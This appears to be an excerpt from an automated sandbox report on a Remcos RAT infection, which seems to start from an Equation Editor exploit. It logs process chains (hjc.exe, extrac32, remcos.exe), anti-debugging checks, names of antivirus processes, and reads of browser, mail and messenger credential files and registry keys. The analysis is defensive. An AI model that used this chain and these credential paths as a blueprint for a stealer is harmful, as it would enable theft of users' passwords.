                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3732Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3692Thread sleep time: -20484000s >= -30000sJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 3688Thread sleep time: -279500s >= -30000sJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 4060Thread sleep time: -60000s >= -30000s
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3896Thread sleep time: -180000s >= -30000s
                        Source: C:\ProgramData\Remcos\remcos.exe TID: 2348Thread sleep time: -120000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_15CA880C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA783C FindFirstFileW,FindNextFileW,5_2_15CA783C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CBC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_15CBC291
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_032358CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,5_2_032358CC
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_2DE910F1
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE96580 FindFirstFileExA,9_2_2DE96580
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA7C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_15CA7C97
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-882
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-846
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-824
                        Source: C:\Users\user\AppData\Roaming\hjc.exeAPI call chain: ExitProcess graph end nodegraph_5-55959
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CDBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_15CDBB22
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA6A63 LoadLibraryA,GetProcAddress,5_2_15CA6A63
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0354051A mov edx, dword ptr fs:[00000030h]2_2_0354051A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CE32B5 mov eax, dword ptr fs:[00000030h]5_2_15CE32B5
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE94AB4 mov eax, dword ptr fs:[00000030h]9_2_2DE94AB4
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CB1CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,5_2_15CB1CFE
                        Source: C:\ProgramData\Remcos\remcos.exeProcess token adjusted: Debug
                        Source: C:\ProgramData\Remcos\remcos.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_15CD4FDC
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CDBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_15CDBB22
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE92639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_2DE92639
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_2DE960E2
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE92B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_2DE92B1C

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Maps a DLL or memory area into another process
                        Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hjc.exe "C:\Users\user\AppData\Roaming\hjc.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RdxcjsngO.bat" "Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\hjc.exe C:\\Users\\Public\\Libraries\\Rdxcjsng.PIFJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\qrvhclucfnyufuwghezckwpljsyrzdsj"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\amas"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\dgnkdwq"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\pisbdjmsvpzm"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\skxtebeuixrzqiq"Jump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cecmfupoefjdsweembv"Jump to behavior
                        Source: remcos.exe, 00000009.00000003.486603942.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845790757.00000000007B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: remcos.exe, 00000009.00000003.427901671.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000003.486603942.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD4C35 cpuid 5_2_15CD4C35
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,OleUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,5_2_0324D5D0
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,5_2_03235A90
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: GetLocaleInfoA,5_2_0323A780
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: GetLocaleInfoA,5_2_0323A7CC
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,OleUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,5_2_0324D5D0
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,5_2_03235B9C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,5_2_03255FA0
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: CoInitialize,OleUninitialize,EnumSystemLocalesA,9_2_0334D5D0
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: EnumSystemLocalesA,9_2_03355F9F
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                        Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CBB4EF GetLocalTime,5_2_15CBB4EF
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CE9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,5_2_15CE9190
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323B748 GetVersionExA,5_2_0323B748
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.drBinary or memory string: cmdagent.exe
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.drBinary or memory string: quhlpsvc.exe
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.drBinary or memory string: avgamsvr.exe
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.drBinary or memory string: TMBMSRV.exe
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.drBinary or memory string: Vsserv.exe
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.drBinary or memory string: avgupsvc.exe
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.drBinary or memory string: avgemc.exe
                        Source: hjc.exe, hjc.exe, 00000005.00000002.376764030.00000000158C0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.5.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\fggrt\logs.dat, type: DROPPED
                        Searches for Windows Mail specific files
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                        Source: C:\ProgramData\Remcos\remcos.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                        Tries to steal Instant Messenger accounts or passwords
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                        Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
